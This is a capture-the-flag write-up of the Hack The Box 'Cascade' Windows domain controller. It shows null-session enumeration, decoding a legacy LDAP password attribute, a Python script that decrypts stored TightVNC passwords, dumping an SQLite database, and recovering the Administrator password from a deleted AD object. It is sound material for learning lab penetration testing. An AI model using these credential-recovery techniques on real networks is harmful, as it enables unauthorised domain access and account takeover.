Hack The Box - Cascade
Cascade is a medium-difficulty Windows box that involves a lot of enumeration: a legacy password attribute exposed over LDAP, a TightVNC registry export whose stored password can be decrypted, an SQLite database in a restricted share, a small reverse-engineering task, and finally the AD Recycle Bin. Really a fun box to try.
Link: https://www.hackthebox.eu/home/machines/profile/235
Let's begin with the initial Nmap scan.
Nmap Scan Results
PORT STATE SERVICE VERSION
53/tcp open domain Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid:
|_ bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2020-06-01 06:23:18Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: cascade.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49157/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49158/tcp open msrpc Microsoft Windows RPC
49165/tcp open msrpc Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 Professional or Windows 8 (91%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%), Microsoft Windows Vista SP2 (91%), Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008 (90%), Microsoft Windows 8.1 Update 1 (90%), Microsoft Windows Phone 7.5 or 8.0 (90%), Microsoft Windows 7 or Windows Server 2008 R2 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: CASC-DC1; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 4m03s
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2020-06-01T06:24:23
|_ start_date: 2020-06-01T06:02:40
SMB Enumeration
I started with SMB. An anonymous (null) session is accepted, but it lists no shares.
root@kali:~# smbclient -L 10.10.10.182
Enter WORKGROUP\root's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup available
RPC Enumeration
RPC also accepts a null session, and enumdomusers returns the domain's user list; every name here is a candidate for later password attempts, and the two service-style accounts (arksvc, BackupSvc) stand out.
root@kali:~# rpcclient -U "" 10.10.10.182
Enter WORKGROUP\'s password:
rpcclient $> enumdomusers
user:[CascGuest] rid:[0x1f5]
user:[arksvc] rid:[0x452]
user:[s.smith] rid:[0x453]
user:[r.thompson] rid:[0x455]
user:[util] rid:[0x457]
user:[j.wakefield] rid:[0x45c]
user:[s.hickson] rid:[0x461]
user:[j.goodhand] rid:[0x462]
user:[a.turnbull] rid:[0x464]
user:[e.crowe] rid:[0x467]
user:[b.hanson] rid:[0x468]
user:[d.burman] rid:[0x469]
user:[BackupSvc] rid:[0x46a]
user:[j.allen] rid:[0x46e]
user:[i.croft] rid:[0x46f]
LDAP Enumeration
First I save the ldap result in a file. And looking at that shows a new thing called cascadeLegacyPwd
, So I just checked if there is any other Pwd and its the only one.
root@kali:~/CTF/HTB/Boxes/Cascade# ldapsearch -h 10.10.10.182 -x -b "DC=cascade,DC=local" '(objectclass=Person)' > ldapresult
root@kali:~/CTF/HTB/Boxes/Cascade# cat ldapresult | grep Pwd
badPwdCount: 0
badPwdCount: 0
badPwdCount: 0
badPwdCount: 0
badPwdCount: 0
cascadeLegacyPwd: clk0bjVldmE=
badPwdCount: 0
badPwdCount: 0
badPwdCount: 0
badPwdCount: 0
badPwdCount: 0
badPwdCount: 0
badPwdCount: 0
badPwdCount: 0
badPwdCount: 0
badPwdCount: 0
badPwdCount: 0
It belongs to the user r.thompson, and the value looks base64 encoded:
root@kali:~/CTF/HTB/Boxes/Cascade# cat ldapresult | grep -B 25 cascadeLegacyPwd:
name: Ryan Thompson
objectGUID:: LfpD6qngUkupEy9bFXBBjA==
userAccountControl: 66048
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 132247339091081169
lastLogoff: 0
lastLogon: 132247339125713230
pwdLastSet: 132230718862636251
primaryGroupID: 513
objectSid:: AQUAAAAAAAUVAAAAMvuhxgsd8Uf1yHJFVQQAAA==
accountExpires: 9223372036854775807
logonCount: 2
sAMAccountName: r.thompson
sAMAccountType: 805306368
userPrincipalName: r.thompson@cascade.local
objectCategory: CN=Person,CN=Schema,CN=Configuration,DC=cascade,DC=local
dSCorePropagationData: 20200126183918.0Z
dSCorePropagationData: 20200119174753.0Z
dSCorePropagationData: 20200119174719.0Z
dSCorePropagationData: 20200119174508.0Z
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 132294360317419816
msDS-SupportedEncryptionTypes: 0
cascadeLegacyPwd: clk0bjVldmE=
This might be the user's password.
root@kali:~/CTF/HTB/Boxes/Cascade# echo -n clk0bjVldmE= | base64 -d
rY4n5eva
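The grep-and-echo steps above work for one attribute, but a small LDIF parser is more reliable over a whole dump, because ldapsearch folds long values onto continuation lines (which grep misses) and base64-wraps binary attributes with a double colon (which must not be confused with a value that is itself base64, like cascadeLegacyPwd). The script below is an added example, not code from the original post; the LDIF it parses is constructed, and only the r.thompson values in it come from the box.

```python
"""Parse ldapsearch (LDIF) output and decode cascadeLegacyPwd per account.

Added example, not code from the original post. It replaces the grep/echo
steps with one pass that handles LDIF line folding, comment lines and
'attr:: value' (base64-wrapped binary) attributes. The LDIF below is
constructed; only the r.thompson values are from the box.
"""
import base64

SAMPLE_LDIF = """\
# extended LDIF
#
# LDAPv3
# filter: (objectclass=Person)

# Ryan Thompson, Users, UK, cascade.local
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
name: Ryan Thompson
objectGUID:: LfpD6qngUkupEy9bFXBBjA==
sAMAccountName: r.thompson
cascadeLegacyPwd: clk0bjVldmE=

# Steve Smith, Users, UK, cascade.local
dn: CN=Steve Smith,OU=Users,OU=UK,DC=cascade,DC=local
sAMAccountName: s.smith
badPwdCount: 0

# Folded Example, Users, UK, cascade.local
dn: CN=Folded Example,OU=Users,OU=UK,DC=cascade,DC=local
sAMAccountName: f.example
description: LDIF folds long values onto continuation lines that start w
 ith one space, so a plain grep would miss the end of this value
cascadeLegacyPwd: not*base64*

# search result
search: 2
result: 0 Success
"""


def parse_ldif(text):
    """Return [{attr: [values]}] for every entry that has a dn.

    Continuation lines (leading space) are joined to the previous line,
    '#' comments are skipped, 'attr:: <b64>' values come back as bytes
    (ldapsearch wraps binary values that way) and plain values stay str.
    """
    unfolded = []
    for raw in text.splitlines():
        if raw.startswith(" ") and unfolded:
            unfolded[-1] += raw[1:]
        else:
            unfolded.append(raw)
    entries, current = [], {}
    for line in unfolded + [""]:            # trailing "" flushes the last entry
        if not line.strip():
            if "dn" in current:              # drops the 'search:/result:' block
                entries.append(current)
            current = {}
            continue
        if line.startswith("#"):
            continue
        attr, sep, value = line.partition(":")
        if not sep:
            continue
        if value.startswith(":"):
            current.setdefault(attr, []).append(base64.b64decode(value[1:].strip()))
        else:
            current.setdefault(attr, []).append(value.strip())
    return entries


def decode_if_base64(value):
    """Decoded text if value is valid base64 of printable UTF-8, else None."""
    try:
        text = base64.b64decode(value, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def find_legacy_passwords(entries, attr="cascadeLegacyPwd"):
    """Map sAMAccountName -> decoded `attr`; values that are not base64 are
    kept verbatim with a 'raw:' prefix so nothing is silently dropped."""
    found = {}
    for entry in entries:
        owner = (entry.get("sAMAccountName") or entry["dn"])[0]
        for value in entry.get(attr, []):
            if isinstance(value, bytes):
                value = value.decode("latin-1")
            decoded = decode_if_base64(value)
            found[owner] = decoded if decoded is not None else "raw:" + value
    return found


if __name__ == "__main__":
    for user, secret in find_legacy_passwords(parse_ldif(SAMPLE_LDIF)).items():
        print(f"{user}: {secret}")
```

Run against the real ldapresult file, find_legacy_passwords(parse_ldif(open("ldapresult").read())) reports every account that carries the attribute in one line each; the 'raw:' fallback is what tells you when a value is something other than base64 and needs a different approach.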
So back to SMB: logging in as r.thompson : rY4n5eva works, the share list is now populated, and with recursive mode switched on I can list every file in the Data share that this user is allowed to read (the ACCESS_DENIED entries below are folders r.thompson cannot open).
root@kali:~/CTF/HTB/Boxes/Cascade# smbclient -L 10.10.10.182 -U 'r.thompson'
Enter WORKGROUP\r.thompson's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Audit$ Disk
C$ Disk Default share
Data Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
print$ Disk Printer Drivers
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
root@kali:~/CTF/HTB/Boxes/Cascade# smbclient //10.10.10.182/Data -U 'r.thompson'
Enter WORKGROUP\r.thompson's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Jan 27 08:57:34 2020
.. D 0 Mon Jan 27 08:57:34 2020
Contractors D 0 Mon Jan 13 07:15:11 2020
Finance D 0 Mon Jan 13 07:15:06 2020
IT D 0 Tue Jan 28 23:34:51 2020
Production D 0 Mon Jan 13 07:15:18 2020
Temps D 0 Mon Jan 13 07:15:15 2020
13106687 blocks of size 4096. 7793839 blocks available
smb: \> recurse on
smb: \> ls
. D 0 Mon Jan 27 08:57:34 2020
.. D 0 Mon Jan 27 08:57:34 2020
Contractors D 0 Mon Jan 13 07:15:11 2020
Finance D 0 Mon Jan 13 07:15:06 2020
IT D 0 Tue Jan 28 23:34:51 2020
Production D 0 Mon Jan 13 07:15:18 2020
Temps D 0 Mon Jan 13 07:15:15 2020
\Contractors
NT_STATUS_ACCESS_DENIED listing \Contractors\*
\Finance
NT_STATUS_ACCESS_DENIED listing \Finance\*
\IT
. D 0 Tue Jan 28 23:34:51 2020
.. D 0 Tue Jan 28 23:34:51 2020
Email Archives D 0 Tue Jan 28 23:30:30 2020
LogonAudit D 0 Tue Jan 28 23:34:40 2020
Logs D 0 Wed Jan 29 06:23:04 2020
Temp D 0 Wed Jan 29 03:36:59 2020
\Production
NT_STATUS_ACCESS_DENIED listing \Production\*
\Temps
NT_STATUS_ACCESS_DENIED listing \Temps\*
\IT\Email Archives
. D 0 Tue Jan 28 23:30:30 2020
.. D 0 Tue Jan 28 23:30:30 2020
Meeting_Notes_June_2018.html A 2522 Tue Jan 28 23:30:12 2020
\IT\LogonAudit
. D 0 Tue Jan 28 23:34:40 2020
.. D 0 Tue Jan 28 23:34:40 2020
\IT\Logs
. D 0 Wed Jan 29 06:23:04 2020
.. D 0 Wed Jan 29 06:23:04 2020
Ark AD Recycle Bin D 0 Fri Jan 10 22:03:45 2020
DCs D 0 Wed Jan 29 06:26:00 2020
\IT\Temp
. D 0 Wed Jan 29 03:36:59 2020
.. D 0 Wed Jan 29 03:36:59 2020
r.thompson D 0 Wed Jan 29 03:36:53 2020
s.smith D 0 Wed Jan 29 01:30:01 2020
\IT\Logs\Ark AD Recycle Bin
. D 0 Fri Jan 10 22:03:45 2020
.. D 0 Fri Jan 10 22:03:45 2020
ArkAdRecycleBin.log A 1303 Wed Jan 29 06:49:11 2020
\IT\Logs\DCs
. D 0 Wed Jan 29 06:26:00 2020
.. D 0 Wed Jan 29 06:26:00 2020
dcdiag.log A 5967 Fri Jan 10 21:47:30 2020
\IT\Temp\r.thompson
. D 0 Wed Jan 29 03:36:53 2020
.. D 0 Wed Jan 29 03:36:53 2020
\IT\Temp\s.smith
. D 0 Wed Jan 29 01:30:01 2020
.. D 0 Wed Jan 29 01:30:01 2020
VNC Install.reg A 2680 Wed Jan 29 00:57:44 2020
smb: \>
Some files seem interesting, so I downloaded them to my machine for further examination.
Meeting_Notes_June_2018.html
-- New production network will be going live on Wednesday so keep an eye out for any issues.
-- We will be using a temporary account to perform all tasks related to the network migration and this account will be deleted at the end of 2018 once the migration is complete. This will allow us to identify actions related to the migration in security logs etc. Username is TempAdmin (password is the same as the normal admin account password).
-- The winner of the "Best GPO" competition will be announced on Friday so get your submissions in soon.
The thing to note here: they used a TempAdmin account for a network migration, its password was the same as the normal admin account's, and the account was to be deleted at the end of 2018. A deleted account whose password was reused for the real admin is worth remembering for later.
Getting User Shell
There is an interesting file in the s.smith folder: VNC Install.reg, a registry export of a TightVNC server configuration. (The two stray characters at the top when you cat it are the UTF-16 byte-order mark; regedit writes .reg exports as UTF-16LE.)
root@kali:~/CTF/HTB/Boxes/Cascade# cat VNC\ Install.reg
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC]
[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"QueryAcceptOnTimeout"=dword:00000000
"LocalInputPriorityTimeout"=dword:00000003
"LocalInputPriority"=dword:00000000
"BlockRemoteInput"=dword:00000000
"BlockLocalInput"=dword:00000000
"IpAccessControl"=""
"RfbPort"=dword:0000170c
"HttpPort"=dword:000016a8
"DisconnectAction"=dword:00000000
"AcceptRfbConnections"=dword:00000001
"UseVncAuthentication"=dword:00000001
"UseControlAuthentication"=dword:00000000
"RepeatControlAuthentication"=dword:00000000
"LoopbackOnly"=dword:00000000
"AcceptHttpConnections"=dword:00000001
"LogLevel"=dword:00000000
"EnableFileTransfers"=dword:00000001
"RemoveWallpaper"=dword:00000001
"UseD3D"=dword:00000001
"UseMirrorDriver"=dword:00000001
"EnableUrlParams"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"AlwaysShared"=dword:00000000
"NeverShared"=dword:00000000
"DisconnectClients"=dword:00000001
"PollingInterval"=dword:000003e8
"AllowLoopback"=dword:00000000
"VideoRecognitionInterval"=dword:00000bb8
"GrabTransparentWindows"=dword:00000001
"SaveLogToAllUsersPath"=dword:00000000
"VideoClasses"=""
The Password value is not a hash. VNC-family servers store the password DES-encrypted under a fixed, publicly known key, so it is reversible offline, and googling how to recover it led to this post
https://github.com/frizb/PasswordDecrypts
Feeding the hex bytes from the registry file into the decrypt there gives the password. Password reuse pays off again: the credentials s.smith : sT333ve2 are accepted by evil-winrm, which gives a user shell.
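The decrypt is worth having as a script rather than a Metasploit snippet, because it also shows the two things that trip people up: .reg files are UTF-16LE with a BOM, and the fixed VNC key appears in two byte orders depending on the DES implementation (VNC's bundled d3des consumes key bits in reverse order, so for a standard library such as OpenSSL or pycryptodome each key byte must be bit-reversed). The following is an added example, not code from the original post or from the PasswordDecrypts page; it assumes pycryptodome is installed (it falls back to the cryptography package), and the .reg text in it is constructed around the Password bytes found on the box.

```python
"""Decrypt the TightVNC "Password" value from a .reg export.

Added example, not code from the original post or from the PasswordDecrypts
page it links. VNC-family servers store the password DES-encrypted under a
fixed, publicly known key, so the value is reversible, not hashed. Assumes
pycryptodome is installed (falls back to the 'cryptography' package). The
.reg text is constructed around the Password bytes found on the box.
"""

# The fixed key exactly as vncauth.c declares it.
VNC_FIXED_KEY = bytes([23, 82, 107, 6, 35, 78, 88, 7])        # 17526b06234e5807


def reverse_bits(byte):
    """Mirror the 8 bits of a byte (0x17 -> 0xe8)."""
    return int(f"{byte:08b}"[::-1], 2)


# VNC's bundled d3des consumes key bits in the opposite order from a standard
# DES library, so for OpenSSL/pycryptodome the key is bit-reversed per byte.
DES_KEY = bytes(reverse_bits(b) for b in VNC_FIXED_KEY)       # e84ad660c4721ae0

# Constructed .reg excerpt: the first Password value is the one from the box,
# the second is the same bytes in regedit's wrapped (backslash-continued) form.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\TightVNC\Server]
"UseVncAuthentication"=dword:00000001
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"PasswordViewOnly"=hex:6b,cf,2a,4b,\
  6e,5a,ca,0f
"AlwaysShared"=dword:00000000
'''


def load_reg_text(raw):
    """Decode the bytes of a .reg file. regedit writes UTF-16LE with a BOM
    (the two garbage characters you see when you cat it); old exports are ANSI."""
    if raw.startswith(b"\xff\xfe"):
        return raw.decode("utf-16")
    return raw.decode("latin-1")


def reg_hex_value(reg_text, value_name):
    """Return the bytes of a '"Name"=hex:aa,bb,...' value, joining the
    backslash-continued lines regedit emits for long values."""
    lines = reg_text.splitlines()
    prefix = f'"{value_name}"=hex:'
    for i, line in enumerate(lines):
        if not line.startswith(prefix):
            continue
        body = line[len(prefix):]
        while body.rstrip().endswith("\\"):
            i += 1
            body = body.rstrip()[:-1] + lines[i].strip()
        return bytes(int(h, 16) for h in (p.strip() for p in body.split(",")) if h)
    raise KeyError(f"{value_name} not found")


def _des_ecb_decrypt(key, data):
    """Single-DES ECB, no padding, with whichever library is available."""
    try:
        from Crypto.Cipher import DES                   # pycryptodome
    except ImportError:
        try:
            from Cryptodome.Cipher import DES           # pycryptodomex
        except ImportError:
            DES = None
    if DES is not None:
        return DES.new(key, DES.MODE_ECB).decrypt(data)
    # cryptography has no single-DES class, but TripleDES with an 8-byte key
    # uses K1 = K2 = K3, which is exactly single DES.
    try:
        from cryptography.hazmat.decrepit.ciphers.algorithms import TripleDES
    except ImportError:
        from cryptography.hazmat.primitives.ciphers.algorithms import TripleDES
    from cryptography.hazmat.primitives.ciphers import Cipher, modes
    dec = Cipher(TripleDES(key), modes.ECB()).decryptor()
    return dec.update(data) + dec.finalize()


def decrypt_vnc_password(blob):
    """VNC keeps one DES block: up to 8 password characters, NUL-padded."""
    if not blob or len(blob) % 8:
        raise ValueError("VNC password blob must be a non-empty multiple of 8 bytes")
    return _des_ecb_decrypt(DES_KEY, blob).rstrip(b"\x00").decode("ascii", "replace")


if __name__ == "__main__":
    for name in ("Password", "PasswordViewOnly"):
        blob = reg_hex_value(SAMPLE_REG, name)
        print(f"{name}: {blob.hex()} -> {decrypt_vnc_password(blob)}")
```

For a real file, pass load_reg_text(open("VNC Install.reg", "rb").read()) to reg_hex_value. The same decrypt is a one-liner with openssl enc -des-ecb -nopad -d -K e84ad660c4721ae0, with the caveat that OpenSSL 3 only exposes single DES through its legacy provider.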
After some enumeration I decided to check SMB again as the new user; s.smith can read the Audit$ share.
root@kali:~/CTF/HTB/Boxes/Cascade# smbclient -L 10.10.10.182 -U 's.smith'
Enter WORKGROUP\s.smith's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Audit$ Disk
C$ Disk Default share
Data Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
print$ Disk Printer Drivers
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available
root@kali:~/CTF/HTB/Boxes/Cascade# smbclient //10.10.10.182/Audit$ -U 's.smith'
Enter WORKGROUP\s.smith's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jan 29 23:31:26 2020
.. D 0 Wed Jan 29 23:31:26 2020
CascAudit.exe A 13312 Wed Jan 29 03:16:51 2020
CascCrypto.dll A 12288 Wed Jan 29 23:30:20 2020
DB D 0 Wed Jan 29 03:10:59 2020
RunAudit.bat A 45 Wed Jan 29 04:59:47 2020
System.Data.SQLite.dll A 363520 Sun Oct 27 12:08:36 2019
System.Data.SQLite.EF6.dll A 186880 Sun Oct 27 12:08:38 2019
x64 D 0 Mon Jan 27 03:55:27 2020
x86 D 0 Mon Jan 27 03:55:27 2020
13106687 blocks of size 4096. 7793037 blocks available
smb: \> cd DB
smb: \DB\> ls
. D 0 Wed Jan 29 03:10:59 2020
.. D 0 Wed Jan 29 03:10:59 2020
Audit.db A 24576 Wed Jan 29 03:09:24 2020
13106687 blocks of size 4096. 7793295 blocks available
smb: \DB\> get Audit.db
getting file \DB\Audit.db of size 24576 as Audit.db (20.3 KiloBytes/sec) (average 20.3 KiloBytes/sec)
smb: \DB\>
The downloaded Audit.db is an SQLite database. Dumping all of its tables shows a user ArkSvc with an encrypted password. Unlike the LDAP value it is not plain base64, so the next step is to reverse engineer CascAudit.exe, the program that reads this database; the System.Data.SQLite.dll beside it suggests a .NET binary, so a .NET decompiler is the natural tool. That yields the decrypted password, and evil-winrm accepts the new credentials ArkSvc : w3lc0meFr31nd.
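The dump itself is routine, but it is worth doing in a way that needs no prior knowledge of the schema, opens the file read-only, and keeps binary columns readable. The script below is an added example, not code from the original post; the database it builds is a constructed stand-in for Audit.db (only the account name ArkSvc comes from the post, the table layout and the password blob are assumed), so it runs offline.

```python
"""Dump every table of an unknown SQLite file, as done with Audit.db above.

Added example, not code from the original post. The database it builds is
a constructed stand-in: only the account name ArkSvc comes from the post,
the table layout and the password blob are assumed.
"""
import os
import sqlite3
import tempfile

SAMPLE_SCHEMA = """
CREATE TABLE Ldap (Id INTEGER PRIMARY KEY, uname TEXT, pwd TEXT, domain TEXT);
INSERT INTO Ldap VALUES (1, 'ArkSvc', 'ENCRYPTED-PLACEHOLDER', 'cascade.local');
CREATE TABLE Misc (Id INTEGER PRIMARY KEY, Ext1 TEXT, Ext2 BLOB);
INSERT INTO Misc VALUES (1, 'constructed row', X'DEADBEEF');
CREATE VIEW "Odd Name" AS SELECT uname, domain FROM Ldap;
"""


def dump_sqlite(path):
    """Return {object_name: (columns, rows)} for every table and view.

    Names come from sqlite_master, so nothing about the schema has to be
    known up front; the file is opened read-only so the evidence is not
    modified; identifiers are quoted so odd names survive; BLOB cells are
    rendered as hex so binary columns stay printable.
    """
    dump = {}
    con = sqlite3.connect(f"file:{path}?mode=ro", uri=True)
    try:
        objects = con.execute(
            "SELECT name FROM sqlite_master WHERE type IN ('table', 'view') "
            "AND name NOT LIKE 'sqlite_%' ORDER BY type, name"
        ).fetchall()
        for (name,) in objects:
            quoted = '"' + name.replace('"', '""') + '"'
            cur = con.execute(f"SELECT * FROM {quoted}")
            columns = [d[0] for d in cur.description]
            rows = [tuple(v.hex() if isinstance(v, bytes) else v for v in row)
                    for row in cur.fetchall()]
            dump[name] = (columns, rows)
    finally:
        con.close()
    return dump


def render(dump):
    """Plain-text rendering, one block per table or view."""
    lines = []
    for name, (columns, rows) in dump.items():
        lines.append(f"== {name} ({len(rows)} rows)")
        lines.append(" | ".join(columns))
        lines.extend(" | ".join("NULL" if v is None else str(v) for v in row) for row in rows)
    return "\n".join(lines)


def dump_sample():
    """Build the constructed Audit.db in a temp dir and dump it."""
    with tempfile.TemporaryDirectory() as workdir:
        path = os.path.join(workdir, "Audit.db")
        con = sqlite3.connect(path)
        con.executescript(SAMPLE_SCHEMA)
        con.close()
        return dump_sqlite(path)


if __name__ == "__main__":
    print(render(dump_sample()))
```

For the real file, print(render(dump_sqlite("Audit.db"))) gives the same view; the sqlite3 command-line client's .tables, .schema and .dump commands are the interactive equivalent.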
Privilege Escalation
Checking the arksvc user shows it is a member of the AD Recycle Bin group (and of Remote Management Users, which is why WinRM works for it).
*Evil-WinRM* PS C:\> net user arksvc
User name arksvc
Full Name ArkSvc
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 1/9/2020 5:18:20 PM
Password expires Never
Password changeable 1/9/2020 5:18:20 PM
Password required Yes
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon 3/30/2020 12:37:25 PM
Logon hours allowed All
Local Group Memberships *AD Recycle Bin *IT
*Remote Management Use
Global Group memberships *Domain Users
The command completed successfully.
The Active Directory Recycle Bin was introduced in the Windows Server 2008 R2 release. The goal of this feature was to facilitate the recovery of deleted Active Directory objects without requiring restoration of backups, restarting Active Directory Domain Services, or rebooting domain controllers.
Since arksvc is in the AD Recycle Bin group it can read deleted objects. After some googling I found this command, which retrieves them: -includeDeletedObjects is what makes tombstoned objects visible, and the filter excludes the Deleted Objects container itself. (Listing only the attributes you care about in -property instead of * keeps the output short.)
*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -filter 'isdeleted -eq $true -and name -ne "Deleted Objects"' -includeDeletedObjects -property *
.
.
.
.
.
.
Name : User
DEL:746385f2-e3a0-4252-b83a-5a206da0ed88
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : container
ObjectGUID : 746385f2-e3a0-4252-b83a-5a206da0ed88
ProtectedFromAccidentalDeletion : False
sDRightsEffective : 0
showInAdvancedViewOnly : True
uSNChanged : 196700
uSNCreated : 196690
whenChanged : 1/26/2020 2:40:52 AM
whenCreated : 1/26/2020 2:34:31 AM
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
CN : TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
codePage : 0
countryCode : 0
Created : 1/27/2020 3:23:08 AM
createTimeStamp : 1/27/2020 3:23:08 AM
Deleted : True
Description :
Here we get the deleted TempAdmin account, and it still carries a cascadeLegacyPwd attribute. The meeting notes told us TempAdmin and the normal admin account shared a password. The value is base64 encoded, so decoding it gives the password.
root@kali:~/CTF/HTB/Boxes/Cascade# echo -n YmFDVDNyMWFOMDBkbGVz | base64 -d
baCT3r1aN00dles
The meeting notes said the normal admin account uses the same password, so this is the Administrator's password as well, and we own the system.